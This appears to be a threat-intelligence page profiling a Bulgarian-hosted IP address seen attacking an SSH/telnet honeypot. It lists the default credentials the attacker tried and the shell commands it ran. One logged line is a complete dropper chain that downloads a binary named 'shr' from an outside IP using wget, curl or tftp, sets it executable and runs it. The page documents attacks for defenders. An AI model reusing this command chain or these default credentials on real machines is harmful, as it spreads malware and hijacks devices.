Active Threat • MEDIUM

85.239.151.41

Country of Origin🇧🇬 BG

First Detection3/26/2026

Last Activity3/27/2026

ISPInterserver, Inc

🎯

Total Attacks

🔌

Ports

📡

Attack Types

🦠

Malware

Geolocation

Country: 🇧🇬 BG
City: Unknown
ASN: AS19318
ISP: Interserver, Inc

Attack Types

ssh_telnet_honeypot

Attacked Ports

Associated Malware

199d11d0fd7043fe9206...→853f57f10f84ee3693b6...→87e18f77a0c4a10abfec...→

Attempted Credentials

🔐admin/admin

🔐admin/password

🔐ubnt/ubnt

Executed Commands

$shell6x

$system6x

$linuxshell6x

$enable3x

$sh3x

$cd /tmp/; echo "senpai" > rootsenpai; cat rootsenpai; rm -rf rootsenpai3x

rm -rf shr; wget http://202.155.10.112/shr || curl -O http://202.155.10.112/shr || tftp 202.155.10.112 -c get shr || tftp -g -r shr 202.155.10.112; chmod 777 shr;./shr ssh; rm -rf shr

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports

Hostnames

elegantnorth.ptr.network

CPEs

cpe:/o:debian:debian_linuxcpe:/o:linux:linux_kernelcpe:/a:openbsd:openssh:7.9p1

Risk Assessment

/100

LowMediumHighCritical